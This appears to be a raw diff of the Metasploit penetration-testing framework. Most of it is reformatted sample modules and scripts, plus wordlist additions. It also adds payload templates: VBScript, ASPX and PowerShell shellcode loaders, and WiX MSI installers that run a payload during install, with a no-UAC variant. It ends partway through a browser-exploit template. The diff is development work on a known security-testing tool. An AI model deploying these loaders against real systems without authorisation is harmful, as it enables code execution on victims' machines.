system("say -v #{voice} -o #{file}.aiff #{text}")
|
||||
end
|
||||
|
||||
sounds.keys.each do |k|
|
||||
create_aiff(voice_name, k, sounds[k])
|
||||
create_aiff(voice_name, k, sounds[k])
|
||||
end
|
||||
|
||||
|
|
|
@ -1,13 +0,0 @@
|
|||
K 10
|
||||
ascii_cert
|
||||
V 1844
|
||||
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
|
||||
K 8
|
||||
failures
|
||||
V 1
|
||||
8
|
||||
K 15
|
||||
svn:realmstring
|
||||
V 26
|
||||
https://metasploit.com:443
|
||||
END
|
|
@ -1,13 +0,0 @@
|
|||
K 10
|
||||
ascii_cert
|
||||
V 1844
|
||||
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
|
||||
K 8
|
||||
failures
|
||||
V 1
|
||||
8
|
||||
K 15
|
||||
svn:realmstring
|
||||
V 30
|
||||
https://www.metasploit.com:443
|
||||
END
|
|
@ -1,5 +1,5 @@
|
|||
Function %{var_func}()
|
||||
%{var_shellcode}
|
||||
%{var_shellcode} = "%{hex_shellcode}"
|
||||
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
|
@ -10,9 +10,11 @@ Function %{var_func}()
|
|||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
|
||||
%{var_stream}.Write %{var_bytes}
|
||||
For i = 1 to Len(%{var_shellcode}) Step 2
|
||||
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
|
||||
Next
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
<%%@ Page Language="C#" AutoEventWireup="true" %%>
|
||||
<%%@ Import Namespace="System.IO" %%>
|
||||
<script runat="server">
|
||||
private static Int32 MEM_COMMIT=0x1000;
|
||||
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
|
||||
|
||||
protected void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
%{shellcode}
|
||||
IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
|
||||
IntPtr %{var_threadId} = IntPtr.Zero;
|
||||
IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
|
||||
}
|
||||
</script>
|
|
@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
|
|||
$%{var_compileParams}.GenerateInMemory = $True
|
||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
||||
|
||||
%{shellcode}
|
||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||
|
||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
*.msi
|
||||
*.wixobj
|
||||
*.wixpdb
|
|
@ -0,0 +1,7 @@
|
|||
Compile using WiX: http://wixtoolset.org
|
||||
|
||||
Recompile with a larger buffer file to increase the available
|
||||
buffer size for larger payloads if required.
|
||||
|
||||
candle template_x86_windows.wxs
|
||||
light template_x86_windows.wixobj
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,18 @@
|
|||
@echo off
|
||||
REM Set PATH to location of your WiX binaries
|
||||
SET PATH=%PATH%;c:\tools\local\wix38-binaries\
|
||||
@echo on
|
||||
|
||||
candle template_windows.wxs
|
||||
light template_windows.wixobj
|
||||
copy template_windows.msi ..\..\template_windows.msi
|
||||
del template_windows.msi
|
||||
del template_windows.wixobj
|
||||
del template_windows.wixpdb
|
||||
|
||||
candle template_nouac_windows.wxs
|
||||
light template_nouac_windows.wixobj
|
||||
copy template_nouac_windows.msi ..\..\template_nouac_windows.msi
|
||||
del template_nouac_windows.msi
|
||||
del template_nouac_windows.wixobj
|
||||
del template_nouac_windows.wixpdb
|
|
@ -0,0 +1,38 @@
|
|||
<?xml version='1.0' encoding='windows-1252'?>
|
||||
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
|
||||
<Product Name='Foobar 1.0' Id='*'
|
||||
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
|
||||
|
||||
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" InstallPrivileges="limited" />
|
||||
|
||||
<Media Id='1' />
|
||||
|
||||
<Directory Id='TARGETDIR' Name='SourceDir'>
|
||||
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
|
||||
<Condition>0</Condition>
|
||||
</Component>
|
||||
</Directory>
|
||||
|
||||
<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
|
||||
<Binary Id='Payload' SourceFile='buffer' />
|
||||
|
||||
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
|
||||
<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='yes' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
|
||||
<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
|
||||
<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
|
||||
|
||||
<Feature Id='Complete' Level='1'>
|
||||
<ComponentRef Id='MyComponent' />
|
||||
</Feature>
|
||||
|
||||
<!-- Define ALLUSERS with a blank value -->
|
||||
<Property Id="ALLUSERS" Secure="yes"/>
|
||||
|
||||
<InstallExecuteSequence>
|
||||
<ResolveSource After="CostInitialize" />
|
||||
<Custom Action="ExecPayload" After="InstallInitialize" />
|
||||
<Custom Action="FailInstallation" Before="InstallFiles" />
|
||||
</InstallExecuteSequence>
|
||||
|
||||
</Product>
|
||||
</Wix>
|
|
@ -0,0 +1,35 @@
|
|||
<?xml version='1.0' encoding='windows-1252'?>
|
||||
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
|
||||
<Product Name='Foobar 1.0' Id='*'
|
||||
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
|
||||
|
||||
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
|
||||
|
||||
<Media Id='1' />
|
||||
|
||||
<Directory Id='TARGETDIR' Name='SourceDir'>
|
||||
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
|
||||
<Condition>0</Condition>
|
||||
</Component>
|
||||
</Directory>
|
||||
|
||||
<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
|
||||
<Binary Id='Payload' SourceFile='buffer' />
|
||||
|
||||
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
|
||||
<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='no' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
|
||||
<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
|
||||
<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
|
||||
|
||||
<Feature Id='Complete' Level='1'>
|
||||
<ComponentRef Id='MyComponent' />
|
||||
</Feature>
|
||||
|
||||
<InstallExecuteSequence>
|
||||
<ResolveSource After="CostInitialize" />
|
||||
<Custom Action="ExecPayload" After="InstallInitialize" />
|
||||
<Custom Action="FailInstallation" Before="InstallFiles" />
|
||||
</InstallExecuteSequence>
|
||||
|
||||
</Product>
|
||||
</Wix>
|
Binary file not shown.
Binary file not shown.
|
@ -1,5 +1,6 @@
|
|||
aspnet_client/
|
||||
Autodiscover/
|
||||
exchange/
|
||||
ecp/
|
||||
EWS/
|
||||
Microsoft-Server-ActiveSync/
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
/AdapterFramework/version/version.jsp
|
||||
/AdobeDocumentServices/Config
|
||||
/AdobeDocumentServices/Config?wsdl
|
||||
/AE/index.jsp
|
||||
|
@ -319,6 +320,7 @@
|
|||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
|
||||
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
|
||||
|
|
|
@ -92,6 +92,7 @@ root
|
|||
router
|
||||
rw
|
||||
rwa
|
||||
s!a@m#n$p%c
|
||||
san-fran
|
||||
sanfran
|
||||
scotty
|
||||
|
|
|
@ -13,22 +13,22 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
|||
require 'msf/base'
|
||||
|
||||
if (ARGV.empty?)
|
||||
puts "Usage: #{File.basename(__FILE__)} module_name"
|
||||
exit
|
||||
puts "Usage: #{File.basename(__FILE__)} module_name"
|
||||
exit
|
||||
end
|
||||
|
||||
modname = ARGV.shift
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
||||
begin
|
||||
# Create the module instance.
|
||||
mod = framework.modules.create(modname)
|
||||
if not mod
|
||||
puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
|
||||
else
|
||||
# Dump the module's information in readable text format.
|
||||
puts Msf::Serializer::ReadableText.dump_module(mod)
|
||||
end
|
||||
# Create the module instance.
|
||||
mod = framework.modules.create(modname)
|
||||
if not mod
|
||||
puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
|
||||
else
|
||||
# Dump the module's information in readable text format.
|
||||
puts Msf::Serializer::ReadableText.dump_module(mod)
|
||||
end
|
||||
rescue
|
||||
puts "Error: #{$!}\n\n#{$@.join("\n")}"
|
||||
puts "Error: #{$!}\n\n#{$@.join("\n")}"
|
||||
end
|
||||
|
|
|
@ -13,18 +13,18 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
|||
require 'msf/base'
|
||||
|
||||
if (ARGV.empty?)
|
||||
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
|
||||
exit
|
||||
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
||||
begin
|
||||
# Create the encoder instance.
|
||||
mod = framework.encoders.create(ARGV.shift)
|
||||
# Create the encoder instance.
|
||||
mod = framework.encoders.create(ARGV.shift)
|
||||
|
||||
puts(Msf::Simple::Buffer.transform(
|
||||
mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
|
||||
puts(Msf::Simple::Buffer.transform(
|
||||
mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
|
||||
rescue
|
||||
puts "Error: #{$!}\n\n#{$@.join("\n")}"
|
||||
puts "Error: #{$!}\n\n#{$@.join("\n")}"
|
||||
end
|
||||
|
|
|
@ -16,5 +16,5 @@ framework = Msf::Simple::Framework.create
|
|||
|
||||
# Enumerate each module in the framework.
|
||||
framework.modules.each_module { |name, mod|
|
||||
puts "#{mod.type}: #{name}"
|
||||
puts "#{mod.type}: #{name}"
|
||||
}
|
||||
|
|
|
@ -14,8 +14,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
|||
require 'msf/base'
|
||||
|
||||
if (ARGV.length == 0)
|
||||
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
||||
exit
|
||||
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
@ -25,28 +25,28 @@ input = Rex::Ui::Text::Input::Stdio.new
|
|||
output = Rex::Ui::Text::Output::Stdio.new
|
||||
|
||||
begin
|
||||
# Initialize the exploit instance
|
||||
exploit = framework.exploits.create(exploit_name)
|
||||
# Initialize the exploit instance
|
||||
exploit = framework.exploits.create(exploit_name)
|
||||
|
||||
# Fire it off.
|
||||
session = exploit.exploit_simple(
|
||||
'Payload' => payload_name,
|
||||
'OptionStr' => ARGV.join(' '),
|
||||
'LocalInput' => input,
|
||||
'LocalOutput' => output)
|
||||
# Fire it off.
|
||||
session = exploit.exploit_simple(
|
||||
'Payload' => payload_name,
|
||||
'OptionStr' => ARGV.join(' '),
|
||||
'LocalInput' => input,
|
||||
'LocalOutput' => output)
|
||||
|
||||
# If a session came back, try to interact with it.
|
||||
if (session)
|
||||
output.print_status("Session #{session.sid} created, interacting...")
|
||||
output.print_line
|
||||
# If a session came back, try to interact with it.
|
||||
if (session)
|
||||
output.print_status("Session #{session.sid} created, interacting...")
|
||||
output.print_line
|
||||
|
||||
session.init_ui(input, output)
|
||||
session.init_ui(input, output)
|
||||
|
||||
session.interact
|
||||
else
|
||||
output.print_line("Exploit completed, no session was created.")
|
||||
end
|
||||
session.interact
|
||||
else
|
||||
output.print_line("Exploit completed, no session was created.")
|
||||
end
|
||||
|
||||
rescue
|
||||
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
||||
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
||||
end
|
||||
|
|
|
@ -15,8 +15,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
|||
require 'msf/base'
|
||||
|
||||
if (ARGV.length == 0)
|
||||
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
||||
exit
|
||||
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
@ -26,43 +26,43 @@ input = Rex::Ui::Text::Input::Stdio.new
|
|||
output = Rex::Ui::Text::Output::Stdio.new
|
||||
|
||||
begin
|
||||
# Create the exploit driver instance.
|
||||
driver = Msf::ExploitDriver.new(framework)
|
||||
# Create the exploit driver instance.
|
||||
driver = Msf::ExploitDriver.new(framework)
|
||||
|
||||
# Initialize the exploit driver's exploit and payload instance
|
||||
driver.exploit = framework.exploits.create(exploit_name)
|
||||
driver.payload = framework.payloads.create(payload_name)
|
||||
# Initialize the exploit driver's exploit and payload instance
|
||||
driver.exploit = framework.exploits.create(exploit_name)
|
||||
driver.payload = framework.payloads.create(payload_name)
|
||||
|
||||
# Import options specified in VAR=VAL format from the supplied command
|
||||
# line.
|
||||
driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
|
||||
# Import options specified in VAR=VAL format from the supplied command
|
||||
# line.
|
||||
driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
|
||||
|
||||
# Share the exploit's datastore with the payload.
|
||||
driver.payload.share_datastore(driver.exploit.datastore)
|
||||
# Share the exploit's datastore with the payload.
|
||||
driver.payload.share_datastore(driver.exploit.datastore)
|
||||
|
||||
# Initialize the target index to what's in the exploit's data store or
|
||||
# zero by default.
|
||||
driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
|
||||
# Initialize the target index to what's in the exploit's data store or
|
||||
# zero by default.
|
||||
driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
|
||||
|
||||
# Initialize the exploit and payload user interfaces.
|
||||
driver.exploit.init_ui(input, output)
|
||||
driver.payload.init_ui(input, output)
|
||||
# Initialize the exploit and payload user interfaces.
|
||||
driver.exploit.init_ui(input, output)
|
||||
driver.payload.init_ui(input, output)
|
||||
|
||||
# Fire it off.
|
||||
session = driver.run
|
||||
# Fire it off.
|
||||
session = driver.run
|
||||
|
||||
# If a session came back, try to interact with it.
|
||||
if (session)
|
||||
output.print_status("Session #{session.sid} created, interacting...")
|
||||
output.print_line
|
||||
# If a session came back, try to interact with it.
|
||||
if (session)
|
||||
output.print_status("Session #{session.sid} created, interacting...")
|
||||
output.print_line
|
||||
|
||||
session.init_ui(input, output)
|
||||
session.init_ui(input, output)
|
||||
|
||||
session.interact
|
||||
else
|
||||
output.print_line("Exploit completed, no session was created.")
|
||||
end
|
||||
session.interact
|
||||
else
|
||||
output.print_line("Exploit completed, no session was created.")
|
||||
end
|
||||
|
||||
rescue
|
||||
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
||||
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
||||
end
|
||||
|
|
|
@ -15,31 +15,31 @@ require 'msf/core'
|
|||
###
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Auxiliary Module',
|
||||
'Description' => 'Sample Auxiliary Module',
|
||||
'Author' => ['hdm'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
['Default Action'],
|
||||
['Another Action']
|
||||
]
|
||||
))
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Auxiliary Module',
|
||||
'Description' => 'Sample Auxiliary Module',
|
||||
'Author' => ['hdm'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
['Default Action'],
|
||||
['Another Action']
|
||||
]
|
||||
))
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Running the simple auxiliary module with action #{action.name}")
|
||||
end
|
||||
def run
|
||||
print_status("Running the simple auxiliary module with action #{action.name}")
|
||||
end
|
||||
|
||||
def auxiliary_commands
|
||||
return { "aux_extra_command" => "Run this auxiliary test commmand" }
|
||||
end
|
||||
def auxiliary_commands
|
||||
return { "aux_extra_command" => "Run this auxiliary test commmand" }
|
||||
end
|
||||
|
||||
def cmd_aux_extra_command(*args)
|
||||
print_status("Running inside aux_extra_command()")
|
||||
end
|
||||
def cmd_aux_extra_command(*args)
|
||||
print_status("Running inside aux_extra_command()")
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -13,23 +13,23 @@
|
|||
###
|
||||
class Metasploit4 < Msf::Encoder
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Sample Encoder',
|
||||
'Description' => %q{
|
||||
Sample encoder that just returns the block it's passed
|
||||
when encoding occurs.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_ALL)
|
||||
end
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Sample Encoder',
|
||||
'Description' => %q{
|
||||
Sample encoder that just returns the block it's passed
|
||||
when encoding occurs.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_ALL)
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the unmodified buffer to the caller.
|
||||
#
|
||||
def encode_block(state, buf)
|
||||
buf
|
||||
end
|
||||
#
|
||||
# Returns the unmodified buffer to the caller.
|
||||
#
|
||||
def encode_block(state, buf)
|
||||
buf
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -15,133 +15,133 @@ require 'msf/core'
|
|||
#
|
||||
###
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
# Set :classid and :method for ActiveX exploits. For example:
|
||||
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
|
||||
# :method => "SetShapeNodeType",
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "8.0",
|
||||
:ua_maxver => "10.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:rank => NormalRanking
|
||||
})
|
||||
# Set :classid and :method for ActiveX exploits. For example:
|
||||
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
|
||||
# :method => "SetShapeNodeType",
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "8.0",
|
||||
:ua_maxver => "10.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:rank => NormalRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Module Name",
|
||||
'Description' => %q{
|
||||
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
|
||||
the browser version. Please note IE8 and newer may emulate an older IE version
|
||||
in compatibility mode, in that case the module won't be able to detect the
|
||||
browser correctly.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://metasploit.com' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
|
||||
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
|
||||
